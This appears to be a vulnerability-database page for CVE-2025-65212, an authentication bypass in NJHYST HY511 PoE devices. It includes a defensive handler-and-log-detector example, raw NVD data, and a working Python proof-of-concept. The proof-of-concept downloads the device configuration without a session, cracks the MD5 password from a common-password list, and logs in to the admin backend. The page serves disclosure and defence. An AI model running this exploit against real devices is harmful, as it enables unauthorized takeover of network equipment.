Security Vulnerability Report
CVE-2025-65212 CVSS 9.8 CRITICAL

CVE-2025-65212

Published: 2026-01-06 16:15:52
Last Modified: 2026-01-29 01:31:03

Description

An issue was discovered in NJHYST HY511 POE core before 2.1 and plugins before 0.1. The vulnerability stems from the device's insufficient cookie verification, allowing an attacker to directly request the configuration file address and download the core configuration file without logging into the device management backend. By reading the corresponding username and self-decrypted MD5 password in the core configuration file, the attacker can directly log in to the backend, thereby bypassing the front-end backend login page.
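Added example, not code from the advisory or from the vendor's firmware: a minimal model of the CWE-565 flaw described above (the config endpoint answers without checking the session cookie) beside a handler that only serves the file when the cookie names a live server-side session, plus a log-side check that flags successful config downloads carrying no session cookie. The endpoint path, session store and access-log format are assumptions.

```python
import hmac
import re
from http.cookies import SimpleCookie

# Assumed endpoint path and constructed server-side session store (not from the advisory).
CONFIG_PATH = "/cgi-bin/config_download"
SESSIONS = {"a3f9c2e1d4b5": "admin"}

def vulnerable_handler(headers):
    """Serves the config on any request: the Cookie header is never checked (CWE-565)."""
    return 200, "username=admin\npassword=<md5-of-password>"

def hardened_handler(headers):
    """Serves the config only when the cookie names a live server-side session."""
    cookie = SimpleCookie(headers.get("Cookie", ""))
    sid = cookie["session"].value if "session" in cookie else ""
    # The cookie is only an opaque key into server state; compare in constant time
    # so a forged id cannot be told apart from an expired one by timing.
    for known in SESSIONS:
        if hmac.compare_digest(sid, known):
            return 200, "username=admin\npassword=<md5-of-password>"
    return 401, ""

# Constructed access-log format: ip ... "GET path HTTP/1.x" status bytes cookie="..."
LOG_RE = re.compile(r'^(\S+) .* "GET (\S+) HTTP/1\.[01]" (\d{3}) \S+ cookie="([^"]*)"$')

def unauthenticated_config_reads(log_lines):
    """Return client IPs whose config download returned 200 with no session cookie."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path, status, cookie = m.groups()
        if path.startswith(CONFIG_PATH) and status == "200" and "session=" not in cookie:
            hits.append(ip)
    return hits

# Constructed sample log lines for a stand-alone run.
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Jan/2026:16:15:52 +0000] "GET /cgi-bin/config_download HTTP/1.1" 200 4312 cookie="-"',
    '198.51.100.2 - - [06/Jan/2026:16:16:01 +0000] "GET /cgi-bin/config_download HTTP/1.1" 200 4312 cookie="session=a3f9c2e1d4b5"',
    '203.0.113.7 - - [06/Jan/2026:16:16:09 +0000] "GET /login.html HTTP/1.1" 200 1021 cookie="-"',
    '203.0.113.9 - - [06/Jan/2026:16:16:30 +0000] "GET /cgi-bin/config_download HTTP/1.1" 401 0 cookie="-"',
]

if __name__ == "__main__":
    print("hardened without cookie:", hardened_handler({}))
    print("suspicious clients:", unauthenticated_config_reads(SAMPLE_LOG))
```

On a patched device the third line of the sample is the expected outcome (401 without a session); the first line is what a device before core 2.1 would log.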

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Weakness
CWE-565 (Reliance on Cookies without Validation and Integrity Checking)

Configurations (Affected Products)

cpe:2.3:o:njhyst:hy511_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:njhyst:hy511:-:*:*:*:*:*:*:* - NOT VULNERABLE
NJHYST HY511 POE core < 2.1
NJHYST HY511 POE plugins < 0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import hashlib
import re

# CVE-2025-65212 PoC - NJHYST HY511 POE Unauthenticated Config Download
# Author: Security Researcher
# Description: This PoC demonstrates the authentication bypass vulnerability
# in NJHYST HY511 POE devices where configuration files can be downloaded
# without proper session validation.

TARGET_HOST = "http://target-device-ip"
CONFIG_PATH = "/cgi-bin/cgi_config_download"  # Common config download endpoint


def exploit_unauthorized_access():
    """
    Step 1: Download configuration file without authentication
    The device does not validate session cookies for config file requests
    """
    print("[+] Attempting to download configuration file...")

    # Direct request to config file - no authentication required
    url = f"{TARGET_HOST}{CONFIG_PATH}"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Accept": "*/*"
    }

    try:
        response = requests.get(url, headers=headers, timeout=10, verify=False)

        if response.status_code == 200:
            print("[+] Configuration file downloaded successfully!")
            config_data = response.text

            # Step 2: Extract username and MD5 password from config
            username = re.search(r'username=(\w+)', config_data)
            md5_password = re.search(r'password=([a-f0-9]{32})', config_data)

            if username and md5_password:
                print(f"[+] Found username: {username.group(1)}")
                print(f"[+] Found MD5 password hash: {md5_password.group(1)}")

                # Step 3: Decrypt the MD5 password (simple MD5 crack)
                # Since the device uses weak self-decrypting MD5, try common passwords
                cracked_password = crack_md5_password(md5_password.group(1))

                if cracked_password:
                    print(f"[+] Cracked password: {cracked_password}")
                    # Step 4: Login to the device backend
                    login_and_access_backend(username.group(1), cracked_password)
        else:
            print(f"[-] Failed to download config. Status: {response.status_code}")

    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")


def crack_md5_password(md5_hash):
    """
    Attempt to crack MD5 password using common/default passwords
    """
    common_passwords = ['admin', 'password', '123456', 'admin123', 'root',
                        'default', '12345', 'admin@123', 'poe_admin', 'config']

    for pwd in common_passwords:
        if hashlib.md5(pwd.encode()).hexdigest() == md5_hash:
            return pwd
    return None


def login_and_access_backend(username, password):
    """
    Step 4: Use obtained credentials to login to the management backend
    This demonstrates complete authentication bypass
    """
    print(f"[+] Attempting to login with credentials: {username}/{password}")

    login_url = f"{TARGET_HOST}/cgi-bin/login"
    data = {
        "username": username,
        "password": password
    }

    try:
        response = requests.post(login_url, data=data, timeout=10, verify=False)

        if response.status_code == 200 and 'session' in response.cookies:
            print("[+] Successfully logged in to backend!")
            print("[+] Full device access obtained - Authentication Bypass Confirmed")
            return True
    except requests.exceptions.RequestException:
        pass

    print("[-] Login failed")
    return False


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-65212 PoC - NJHYST HY511 POE Authentication Bypass")
    print("=" * 60)
    exploit_unauthorized_access()

References

https://gist.github.com/a2148001284/bcdda75fc8718454f16a7b9259463719 (Third Party Advisory)
https://github.com/a2148001284/test1/blob/main/%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E5%90%8E%E5%8F%B0%E6%BC%8F%E6%B4%9EEN.md (Exploit, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65212", "sourceIdentifier": "[email protected]", "published": "2026-01-06T16:15:51.670", "lastModified": "2026-01-29T01:31:03.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in NJHYST HY511 POE core before 2.1 and plugins before 0.1. The vulnerability stems from the device's insufficient cookie verification, allowing an attacker to directly request the configuration file address and download the core configuration file without logging into the device management backend. By reading the corresponding username and self-decrypted MD5 password in the core configuration file, the attacker can directly log in to the backend, thereby bypassing the front-end backend login page."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-565"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:njhyst:hy511_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.1", "matchCriteriaId": "7B0D8BB1-8246-431D-B187-0C96DFBA87A3"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:njhyst:hy511:-:*:*:*:*:*:*:*", "matchCriteriaId": "26D132E8-AC27-4F78-9DBF-1D91B4FC75D1"}]}]}], "references": [{"url": "https://gist.github.com/a2148001284/bcdda75fc8718454f16a7b9259463719", 
"source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/a2148001284/test1/blob/main/%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E5%90%8E%E5%8F%B0%E6%BC%8F%E6%B4%9EEN.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}